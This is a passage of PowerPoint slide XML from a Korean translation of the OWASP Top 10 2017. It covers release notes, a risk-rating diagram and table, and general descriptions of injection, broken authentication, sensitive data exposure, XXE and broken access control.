                        <a:rPr lang="ko-KR" alt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항목과 병합됨</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542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  <a:endParaRPr lang="en-US" sz="95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XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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외부 개체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(XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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신규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]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B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잘못된 보안 구성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취약한 접근 통제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ko-KR" altLang="en-US" sz="95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합침</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B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민감한 데이터 노출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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잘못된 보안 구성</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent3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en-US" sz="9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기능 수준의 접근 통제 누락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kern="120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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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항목과 병합됨</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200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]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542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  <a:endParaRPr lang="en-US" sz="95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en-US" sz="950" b="1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크로스 사이트 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" b="1" kern="12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스크립팅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(XSS)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크로스 사이트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요청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변조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(CSRF)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  <a:endParaRPr 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안전하지 않은 역직렬화</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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신규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커뮤니티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A9 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" b="1" kern="12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알려진 취약점이 있는 구성요소 사용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알려진 취약점이 있는 구성요소 사용</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="12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 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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검증되지 않은 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" b="1" kern="120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리다이렉트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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및 포워드</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C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  <a:endParaRPr lang="en-US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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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불충분한 로깅</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1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ko-KR" altLang="en-US" sz="950" b="1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및 모니터링</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200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신규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커뮤니티</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200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]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>RN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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>릴리즈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 노트</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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2688431" y="7439819"/>
            <a:ext cx="858839" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117852" y="7010400"/>
            <a:ext cx="615948" cy="394295"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 515"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B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474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49378"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="3962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278">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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애플리케이션 보안 위험은 무엇인가</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>?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22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공격자들은 여러분의 사업이나 조직에 피해를 입히기 위해 애플리케이션을 통한 다양한 경로를 사용할 수 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각 경로들은 여러분에게 충분히 주의를 줄 만한 중대한 위협이거나 그렇지 않은 위협을 보여줍니다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공격자들이 이러한 경로들을 종종 찾아내서 공격하는 것이 쉬울 수도 있고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매우 어려울 수도 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마찬가지로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공격을 받아 발생한 손해는 결과가 경미할 수 있으나 여러분의 사업을 몰락시킬 수 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여러분은 조직이 받는 위험을 판단하기 위해서 각 위협 요소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 방법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보안 취약점과 관련된 가능성을 검토하고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이들을 통합하여 조직에 미치는 기술적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사업적 영향력으로 평가할 수 있습니다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종합적으로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이러한 요인들을 근거로 전체적인 위험을 판단할 수 있게 됩니다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29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="276909" y="1889419"/>
            <a:ext cx="6287260" cy="2052511"/>
            <a:chOff x="276909" y="2138489"/>
            <a:chExt cx="6287260" cy="2052511"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="3343275"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5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ko-KR" alt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취약점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5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495300" y="2505077"/>
              <a:ext cx="139699" cy="304801"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7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10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2" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2490788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공격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276909" y="2138489"/>
              <a:ext cx="646331" cy="197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위협요소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5715000" y="2466975"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 125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영향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2362201" y="2466971"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3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ko-KR" alt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취약점</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="85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4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98475" y="2924177"/>
              <a:ext cx="139699" cy="304801"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25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>
              <a:off x="1371600" y="2924175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공격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1447497" y="2138489"/>
              <a:ext cx="686406" cy="1949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공격 벡터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735436" y="2139676"/>
              <a:ext cx="761747" cy="1949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</a:rPr>
                <a:t>보안취약점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Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4538534" y="2139675"/>
              <a:ext cx="801823" cy="1949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기술적 영향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5654946" y="2138489"/>
              <a:ext cx="909223" cy="197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비즈니스 영향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45" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="335280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공격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59" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="29241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영향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60" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="33813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영향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61" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="34861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자산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62" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3076575"/>
              <a:ext cx="685800" cy="428655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기능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64" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="26860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ko-KR" alt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자산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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2905125"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6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ko-KR" alt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취약점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6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52" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="66" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="211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79" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="247650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85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통제</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="85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3733799" y="291465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85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통제</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="85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sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="381000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85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통제</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="85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  <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362200" y="3800475"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr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ko-KR" alt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  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>취약점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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="86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98" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="56" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="44026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2" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="3" idx="3"/>
              <a:endCxn id="79" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="2666731"/>
              <a:ext cx="228600" cy="26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5" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="66" idx="3"/>
              <a:endCxn id="80" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="3104885"/>
              <a:ext cx="228599" cy="26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4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238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20" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="64" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="2428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6" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="79" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="2667000"/>
              <a:ext cx="457200" cy="2333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58" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="80" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4190999" y="2900348"/>
              <a:ext cx="457201" cy="2048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33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4191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AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="81" idx="3"/>
              <a:endCxn id="62" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4191000" y="3290903"/>
              <a:ext cx="457200" cy="7095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AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="85" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490728" cy="89746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AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="85" idx="3"/>
              <a:endCxn id="81" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505199" y="4000235"/>
              <a:ext cx="228601" cy="26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AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="62" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="6334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3631349" y="2141956"/>
              <a:ext cx="646331" cy="195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ko-KR" altLang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>보안통제</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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en-US" sz="3600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Risk</a:t>
            </a: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보안 위험</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69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00319"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4953578"/>
          <a:ext cx="4495800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고려할 위험은 무엇인가요</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"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?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7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OWASP Top 10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는 광범위한 조직에게 발생할 수 있는 가장 심각한 웹 애플리케이션 보안 위험들을 식별하는 데 초점을 맞추고 있습니다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아래에 있는 간단한 평가표를 이용하여 각 위험에 대한 가능성과 기술적인 영향에 관한 포괄적인 정보를 제공합니다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다음 표는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/>
                        </a:rPr>
                        <a:t>OWASP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  <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>위험 평가 방법론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기초합니다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이번 판에서 주어진 모든 위험에 대한 영향력과 그 위험이 일어날 가능성을 계산하는 데 도움을 주고자 위험 등급 시스템을 업데이트 하였습니다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보다 자세한 사항은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‘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  <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>위험 요인에 대한 세부 정보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’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확인하십시오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각 조직은 고유하며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해당 조직의 위협 요소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목표 및 위반사항의 어떠한 영향도 마찬가지입니다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공익 단체가 공공 정보를 위해 콘텐츠 관리 시스템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(CMS)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을 이용하고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건강 시스템이 민감한 건강 데이터 기록을 위해 동일한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CMS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를 사용하면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같은 소프트웨어 사이 위협 요소와 사업적 영향은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매우 다를 수 있습니다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해당 위협 요소와 사업적 영향을 기반으로 내 조직의 위험을 이해하는 것이 중요합니다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  <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="9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가능한 경우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일반적으로 받아들여지는 보안 실천사항을 촉진하고 혼란을 줄이기 위해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Top 10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에 있는 위험의 이름들을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  <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Common Weakness Enumeration </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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(CWE) </a:t>
                      </a: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취약점과 맞춥니다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. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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56148"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="76199" y="6102170"/>
          <a:ext cx="4388400" cy="10210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위협 요소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공격 가능성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취약점 확산정도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취약점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탐지 정도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기술적 영향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사업적 영향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애플리케이션 특징</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="8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rgbClr val="FEFF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광범위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rgbClr val="FEFF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쉬움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rgbClr val="FEFF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심각</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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rgbClr val="FEFFFF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비즈니스 특징</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="85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보통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일반적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보통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보통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드묾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경미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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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18113"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="4953000"/>
          <a:ext cx="2236914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2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65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참조문서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35">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150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OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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  <a:hlinkClick r:id="rId8"/>
                      </a:endParaRP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OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none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kern="12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Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none" kern="12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57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1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marL="57150" indent="-571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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>외부자료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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="8280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ISO 31000: Risk Management </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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Std</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none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  <a:hlinkClick r:id="rId10"/>
                      </a:endParaRP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ISO 27001: ISMS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NIST Cyber Framework (US)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none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ASD Strategic Mitigations (AU)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NIST CVSS 3.0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Microsoft Threat Modelling Tool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031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en-US" sz="3600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>T10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j-ea"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>애플리케이션 보안 위험 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>– 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="+mj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308A3-3666-418A-9AE6-240E4688F2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-685800" y="990600"/>
            <a:ext cx="8153400" cy="8001000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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00BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="1031120"/>
            <a:ext cx="5218177" cy="7119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SQL, OS, XXE, LDAP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인젝션 취약점은 신뢰할 수 없는 데이터가 명령어나 쿼리문의 일부분으로써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인터프리터로 보내질 때 발생합니다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공격자의 악의적인 데이터는 예기치 않은 명령을 실행하거나 올바른 권한 없이 데이터에 접근하도록 인터프리터를 속일 수 있습니다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7AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="1014215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A1:2017-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인젝션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D11D811-BC41-418D-90D1-CD609B0626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="1812675"/>
            <a:ext cx="5218177" cy="7479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인증 및 세션 관리와 관련된 애플리케이션 기능이 종종 잘못 구현되어 공격자들이 암호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세션 토큰을 위험에 노출시킬 수 있거나 일시적 또는 영구적으로 다른 사용자의 권한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획득을 위해 구현 상 결함을 악용하도록 허용합니다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56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="1817196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A2:2017-</a:t>
            </a:r>
            <a:b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취약한</a:t>
            </a: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 </a:t>
            </a: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인증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5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="2621888"/>
            <a:ext cx="5218177" cy="753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다수의 웹 애플리케이션과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는 금융 정보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건강 정보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개인 식별 정보와 같은 중요한 정보를 제대로 보호하지 않습니다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공격자는 신용카드 사기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신분 도용 또는 다른 범죄를 수행하기 위해 보호가 취약한 데이터를 훔치거나 수정할 수 있습니다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중요한 데이터는 저장 또는 전송할 때 암호화 같은 추가 보호 조치가 없으면 탈취 당할 수 있으며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브라우저에서 주고 받을 때 각별한 주의가 필요합니다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BF109756-C917-4ECB-9826-AC54F0948B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="262017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A3:2017-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민감한 데이터 노출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2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="3424870"/>
            <a:ext cx="5218177" cy="7299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오래되고 설정이 엉망인 많은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프로세서들은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XML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문서 내에서 외부 개체 참조를 평가합니다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외부 개체는 파일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URI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처리기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내부 파일 공유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내부 포트 스캔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원격 코드 실행과 서비스 거부 공격을 사용하여 내부 파일을 공개하는데 사용할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="12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3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="342503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A4:2017-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XML </a:t>
            </a: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외부 개체 </a:t>
            </a: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(XXE)</a:t>
            </a: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25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="4228186"/>
            <a:ext cx="5218177" cy="7296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인증된 사용자가 수행할 수 있는 작업에 대한 제한이 제대로 적용되어 있지 않습니다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공격자는 이러한 결함을 악용하여 다른 사용자의 계정에 접근하거나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중요한 파일을 보거나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다른 사용자의 데이터를 수정하거나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접근 권한을 변경하는 등 권한 없는 기능과 데이터에 접근할 수 있습니다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0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="4228019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A5:2017-</a:t>
            </a:r>
            <a:b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취약한 접근 통제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AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490400" y="5029201"/>
